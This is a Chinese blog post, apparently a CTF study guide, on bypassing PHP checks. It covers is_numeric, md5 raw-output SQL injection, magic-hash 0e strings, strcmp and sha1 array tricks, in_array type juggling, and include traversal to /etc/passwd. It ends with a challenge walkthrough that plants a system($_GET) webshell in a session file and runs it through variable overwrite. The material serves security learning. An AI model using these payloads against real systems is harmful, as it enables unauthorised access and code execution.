php安全特性函数以及绕过方法

最新推荐文章于 2024-08-11 00:26:41 发布
最新推荐文章于 2024-08-11 00:26:41 发布
阅读量2.9k 收藏 16
点赞数 3
分类专栏: 安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/109958431
版权

一,常见的安全特性函数

php安全特性函数总结
php安全特性函数花式绕过
①is_numeric()
作用:检测变量是否为数字或数字字符串
绕方法:16进制会被判断为数字
%00即空格会被判断为非数字–>即直接跳过检测了
绕过方法


在这里插入图片描述
绕过方法
password=404%00–>即可绕过
同等类型

$a==0 and $a

同等方法绕

②数字类问题
利用科学计数法进行绕–>1e9=100000000
在这里插入图片描述
③php中的MD5函数
MD5($password,true)
存在漏洞–>函数作用–>将传入的字符串进行MD5,进行md5后在true返回非常规的二进制
绕过方法

ffifdyop
md5后,276f722736c95d99e921722cf9ed621c
再转成字符串: 'or'6<其他字符>
形成闭合进而实现绕过
#如案例
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
直接传password为ffifdyop即可

④md5判断相等类绕方法
1.利用伪加密进行绕
2.利用数组进行绕
原理:md5不可处理数组,因此导致数组均返回为NULL,从而实现了绕过

在这里插入图片描述
绕方法–>可以利用

⑤php的弱比较–>==

#绕过方法
bealn型true可以和任何类型的数据相等;

⑥strcmp()函数绕过思路
漏洞:在PHP5.3之前,传入数据的类型是字符串类型,当传入的类型不是字符串类型 函数就会发生错误,显示报错信息后会return 0
即传入的如果不是字符串即会爆错,从而实现绕过

如绕过实例

<?php
$password="***************";
if(isset($_GET['password'])){
if(strcmp($_GET['password'],$password)==0){
echo "flag{xxxxx-xxx-xxxx}";
}else{
echo "NO password ";
}
}
?>
#即如果传入的如果是password[]=1即以数组传入特点,就会产生爆错,但返回的仍然是假即0,从而实现了绕过

⑦in_array函数绕过方法

#利用强执转换绕
#如字符类型绕
$whitelist = ["hit"];
if (in_array($page, $whitelist)) {
    echo "yes";
    return true;
    #即如果传入的是page=hit#即可进行绕过
#数字型绕
$whitelist = [1,2,3];
if (in_array($page, $whitelist)) {
    echo "yes";
    return true;    
#page=1wff 1; 1,(前面是数字后面是字符串或者符号 进行绕过)即强制性转换了

⑧include函数绕

include("index.php?../../../../../etc/passwd");
#这样可以绕过文件包含限制,达到任意文件包含的目的

⑨intval函数绕过思路

intval('1024e')  结果为1024      intval('1024e1')结果为1024     intval('0x23333')结果为0

⑩substr截取

<?php
$rest = substr("abcdef", 0, -1);  // 返回 "abcde"
$rest = substr("abcdef", 2, -1);  // 返回 "cde"
$rest = substr("abcdef", 4, -4);  // 返回 ""
$rest = substr("abcdef", -3, -1); // 返回 "de"
?>
#后面的一个数字表示不要多少字符,第一个数字表示第一个字符的数字

php函数漏洞

常用的基础函数知识

1.)字符串之间拼接方法–>用 . 链接 如:$file = “templates/”
. $page . “.php”; page是一个对象,字符串外面要加双引号

2.)strops(’$file’, ‘…’)函数,作用返回b字符串第一次在a中出现的位置
如strpos(a,b)会返回b字符串第一次在a中出现的位置,如果没有找到则返回False
3.substr()
返回字符串的子串

echo substr(‘abcdef’, 0, 4); // abcd
echo substr(‘abcdef’, 0, 8); // abcdef
echo substr(‘abcdef’, -1, 1); // f–>即从负数开始即从逆向倒数的思路代
4.serialize()即序列化
将一个对象转换成一个字符串
unserialize()
将字符串还原为一个对象

在这里插入代码片

很不错的总结文档

常见的执行函数知识

执行函数与配置信息函数

php代码审计后常用的解密方法

脚本解密方法写法

典型php代码审计类题目

代码审计典型题型
php代码审计类型1
代码审计类型2
代码审计典型类型3

结合序列号考类

① php弱比较

<?php
show_source(__FILE__);
$username  = "admin";
$password  = "password";
include("flag.php");
$data = isset($_POST['data'])? $_POST['data']: "" ;
$data_unserialize = unserialize($data);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";
}

分析代码,因为if语句中用的是==
所以可以构造值类状况进行绕–>即弱比较

===会比较两个变量的类型~~
即可以绕弱比较
而==只比较他们的值~~~
比如整数0和浮点数0.0
用==比较返回TRUE
用===比较返回FLASE

即构造值为1即可,又因为题目中的代码需要序列化,所以用下面的代码测试后可获得
a:2:{s:8:“username”;b:1;s:8:“password”;b:1;}
即构造?data=a:2:{s:8:“username”;b:1;s:8:“password”;b:1;}即可获得flag

<?php
$username='xiaolong';#即data参数可构造
$data=[
    'username'=>true,
    'password'=>true,
];
$p1=serialize($data);
echo $p1;#即下面这个即可构造弱比较-->进行实现序列化后弱比较,即以后遇到弱比较类题,可代这种模式进行解
$p2=unserialize($p1);
echo $p2['username'];
if($p2['username']==$username)
{
    echo 'nice';
}
else
{
    echo 'no';
}
?>

②ctf含义类理解

1.)file_get_contents($text,‘r’)要等于某个字符串
注意与绕协议直接的关系
即对于识别不了的协议,会当做目录,故而可以利用方法绕

httpsssss://baidu.com/../../../../.,./../../../flag

典型的内容状况特点类
在这里插入图片描述即直接构造text–>即可完事

?text=data:text/plain,weclome to the zjctf

2.)id=0且id不等于数字类

1.)利用0e绕,因为php中默认将0e当作0
2.)或者截断绕%00

3.)eregi(“111”.substr($b,0,1),“1114”) 匹配函数绕方法–>即匹配的内容只要是后面的即可,因此可以进行截取从而实现绕过

 1.)利用星号或问号或.点号绕过正则表达式的匹配
 *23456 或者.asdfasd(任意字符均可)-->即含义匹配任意的意思
 2.)利用%00截断绕
 b=%00411111a即进行绕这个匹配语句,利用特性eregi函数中的substr不会被截断
 3.)md5加密后恰好为-->0e开头的字符串s878926199a
 

#0e开头的md5和原值:
QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

PHP弱类型&&md5碰撞总结
用里面的类型代就好了
在这里插入图片描述

在这里插入图片描述

";if(!$_GET['id'])即id不能为数字但id必须为0

{
header('Location: hello.php?id=1');

exit();

}

$id=$_GET['id'];

$a=$_GET['a'];

$b=$_GET['b'];

if(stripos($a,'.'))

{
echo 'no no no no no no no';

return ;

}

$data = @file_get_contents($a,'r');

if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

{
require("f4l2a3g.txt");

}

else

{
print "never never never give up !!!";

}

?>
#即最后构造的payload-->id=0e&a=php://input&b=.qwert
#post的内容-->bugku is a nice plateform!

3.)绕sha比较
sha()函数–>作用:加密作用
绕方法–>利用sha()函数只对字符串进行加密,不对数组加密的特性进行绕

 <?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

最后payload
在这里插入图片描述

PHP代码审计经典利用

题目1–>变量覆盖+文件包含getshell

代码审计题目: `bast_php`
题目来源:XCTF 2018 final

基础知识点:session_start() 
功能:会创建新会话或者重用现有会话,即初始化超全局变量SESSION变量,且可修改session的保存位置
常见保存的路径
/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/var/lib/php5/sess_PHPSESSID
/var/lib/php5/sessions/sess_PHPSESSID 
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID



<?php
    highlight_file(__FILE__);
    error_reporting(0);
    ini_set('open_basedir', '/var/www/html:/tmp');
    $file = 'function.php';
    $func = isset($_GET['function'])?$_GET['function']:'filters';
    call_user_func($func,$_GET);
    include($file);
    session_start();
    $_SESSION['name'] = $_POST['name'];
    if($_SESSION['name']=='admin'){
        header('location:admin.php');
    }
?> 

利用payload

①function=session_start&save_path=.
name=name=<?php echo "aaa";system($_GET[x]);?>
目的将session的保存位置更改到path路径且传参为马
②利用变量覆盖
function=extract&file=/tmp/sess_a9tvfth9lfqabt9us85t3b07s1&x=cat+sdjbhudfhuahdjkasndjkasnbdfdf.php
进行读取flag

典型php漏洞介绍
php典型漏洞题

goddemon
关注
专栏目录
php intval绕过 注入,PHP代码审计片段讲解(入门代码审计、CTF必备)
weixin_36290287的博客
04-12 1826
关于本项目代码审计对于很多安全圈的新人来说,一直是一件头疼的事情,也想跟着大牛们直接操刀审计CMS?却处处碰壁:函数看不懂!漏洞原理不知道!PHP特性更不知!那还怎么愉快审计?不如化繁为简,跟着本项目先搞懂PHP中大多敏感函数与各类特性,再逐渐增加难度,直到可以吊打各类CMS~本项目讲解基于多道CTF题,玩CTF的WEB狗也不要错过(^-^)V题的源码在Github: bowu (Github),...
eval长度限制绕过 && PHP5.6新特性
m0_59049258的博客
08-22 810
死亡绕过代码:exit.phpphpphp exit;>';?查看后台,确实生成了文件,但是文件内容拼接在exit后面。程序遇见即结束。将绕过这种限制的行为称为死亡绕过。我们想要绕过就需要将
PHP函数绕过
慎铭的博客
02-17 565
md5()   md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。如需计算文件的 MD5 散列,请使用 md5_file() 函数。 语法 md5(string, raw) - string 不可缺省。规定要计算的字符串 - raw 可缺省。规定十六进制或二进制的输出格式: - TRUE - 原始 16 字符二进制格式 - FALSE - 默认。32 字符十六进制数 - 返回值 如果成功则返回已计算的 MD5 散列,如果失败则返回 FA
PHP语言特性漏洞汇总【万字详解】
最新发布
2301_80064376的博客
08-11 1410
PHP 的一些特性,如动态函数调用、弱类型比较和文件包含机制,可能导致安全漏洞。这些特性如果未正确使用或验证,会被恶意用户利用,导致任意代码执行、信息泄露或权限绕过。确保输入验证和安全配置是防范此类漏洞的关键。
绕过函数方法
qq_50613938的博客
11-03 354
127.0.0.1 & ls ——ll ;查看本地目录 当某一些字符被过滤掉,绕过 “;”分隔符可以使用%0a代替 |,||,&,&&,五个管道符 不加通配符的like可以用来当做=号使用 空格键;/**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 %0a代替换行,%09代替TAB键(因为flag被过滤了,所以我们通过TAB来补全flag_is_here) %5c代替\(用\来分隔开cat,因为cat也被过滤了qwq)%27是单引号 ca
php is_numeric函数绕过
qq_56426046的博客
10-11 1327
php中当一个其他数据类型和数值类型的数据比较大小时,会先将其他数据类型转换成数值类型,这里输入类似1250a数据也可绕过。is numericl函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后。is_numeric(0判断变量是否为数字或数字字符串,不仅检查10进制,16进制是可以。以,查看函数发现该函数对对于第一个空格字符会跳过空格字符判断,接着后面的判断!1.数组加16进制绕过
php 绕过 正则,Bugku | 数字验证正则绕过
weixin_28949937的博客
03-23 353
语法:int preg_match_all (字符串$ pattern ,字符串$ subject [,数组和$ matches [,整数$ flags = PREG_PATTERN_ORDER [,整数$ offset = 0 ]]] )搜索主题中所有匹配模式给定正则表达式的匹配结果并将它们以标志指定顺序输出到匹配中。在第一个匹配找到后,子序列继续从最后一次匹配位置搜索。参数说明:$ patte...
php函数禁用绕过的原理与利用1
08-03
然而,安全措施往往伴随着绕过方法,本文主要探讨如何理解和利用`disable_functions`禁用机制的原理,以及在面对限制时如何进行功能的规避。 首先,当我们拿到一个Webshell时,可能会遇到`disable_functions`已经...
2024年网络安全最新ctf中常见php特性_php特性 ctf
m0_54903333的博客
05-03 962
在这个例子中,如果攻击者将恶意的PHP代码作为评论提交,如,它会被存储到数据库,并在评论显示时执行。这种远程代码执行漏洞可能导致攻击者获得应用程序的控制权,执行任意的系统命令,访问敏感数据等。24. ## 六、PHP类型强制转换:通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。25. PHP类型强制转换是指通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。
绕过安全狗的PHP与ASP代码技巧
在网络安全领域,"php安全狗"通常是指通过编写特定的PHP代码来绕过安全狗这样的Web应用防火墙(WAF)的过滤规则。安全狗是一种常见的服务器安全防护软件,它会检测并阻止可能的恶意请求,包括SQL注入、XSS攻击等。...
一些需要禁用的PHP危险函数(disable_functions)
10-28
11. `error_log()`: 将错误信息发送到指定位置,某些版本的PHP中,可以绕过安全模式执行命令。 12. `ini_alter()`, `ini_set()`: 修改PHP配置,可能被用来改变安全设置。 13. `ini_restore()`: 恢复配置,可能被...
php正则屏蔽问号,正则表达式如何过滤问号
weixin_35734296的博客
03-18 159
我想从如下内容中提取url:{"code":0,"data":{"cdnFileUrl":"http://download.example.com.cn/download/product/mi/rules/example_url_201902123.pkg","code":0,"message":"success","packageVersion":"2019021914170...
科学计算法+php绕过,PHP采用超长位数字运算防止数字以科学计数法显示的实例...
weixin_33716865的博客
03-21 243
本文主要介绍了PHP采用超长(超大)数字运算防止数字以科学计数法显示的方法,涉及PHP数学运算及字符串操作的相关技巧。希望对大家有所帮助。本文实例讲述了PHP采用超长(超大)数字运算防止数字以科学计数法显示的方法,分享给大家供大家参考。具体如下:PHP计算大数值运算时会出错,当数字太大时,数值会变成科学计数.那怎么来进行PHP超大数值运算,包括加减乘除,幂运算,平方根,取模运算呢?要解决科学计数的...
PHP花式绕过大全
热门推荐
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,记录一下各种可能会存在绕过php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
PHP一些函数绕过总结
weixin_52230368的博客
08-10 1201
可以引入\f(也就是%0c)在数字前面,来绕过最后那个is_palindrome_number函数,而对于前面的数字判断,因为intval和is_numeric都会忽略这个字符,所以不会影响。同理,intval(” \r\n \t 12″),也会正常返回12。的文字这样输出会出现乱码情况第一个参数是你文本的编码第二个参数是你要转换的文本格式第三个是你要转换的文本使用之后把返回结果赋值给。这里用的是strcmp()函数,这个函数是用于比较字符串的函数,但是倘若他收到一个数组形式的数据时,这个函数将发生错误。
in_array函数漏洞
weixin_38230961的博客
08-28 2573
#以下,'7eee'被强制转换成整型 7 var_dump(in_array('7eee', [1, 2, 7, 9]));//true #如果第三个参数设置为 true,函数只有在元素存在于数组中且数据类型与给定值相同时才返回 true。 var_dump(in_array('7eee', [1, 2, 7, 9], true));//false 同理: $v = in_array(0...
PHP-Audit-Labs Day1:in_array函数缺陷
0xdawn的博客
06-23 816
in_array() 函数 函数介绍 in_array() 函数搜索数组中是否存在指定的值。 in_array(search,array,type) 参数 描述 search 必需。规定要在数组搜索的值。 array 必需。规定要搜索的数组。 type 可选。如果设置该参数为 true,则检查搜索的数据与数组的值的类型是否相同。 如果search参数是字符串且type参数被设置为TRUE,则搜索区分大小写且检查数据类型。 in_array绕过 class Challenge{
CTF_Web:php弱类型绕过与md5碰撞
AFCC_的博客(Web_Dog)
08-09 8651
0x00 前言 md5碰撞只是一种掌握php弱类型的方式,弱类型的内容有很多,数组、字符串比较等等,但不论以哪种方式考,涉及的知识点都是相通的,希望通过对基础知识的分享与大家一同学习进步。 0x01 什么是md5 “MD5,即消息摘要算法(英语:MD5 Message-Digest Algorithm)。是一种被广泛使用的密码散列函数,将数据(如一段文字)运算变为另一固定长度值,是散列算法的基础原理,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。 显然12
22.2.26学习日记:php intval( )函数
weixin_62575261的博客
03-26 5090
今天在ctf-show里面完成了web萌新1,对php intval()函数有了一些了解。 首先先看题目,直接给出了源码 里面运用到了intval函数,对此特别进行学习! (部分内容来自PHP intval() 函数 | 菜鸟教程) intval函数主要是用于获取变量的整数值。 同时此函数也通过使用指定的进制base进制(默认是十进制),返回变量var的integer数值。 从源码上可以看出,我们需要输入id,同时这个id要等于1000才能显示出源码。但是当id大于999时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值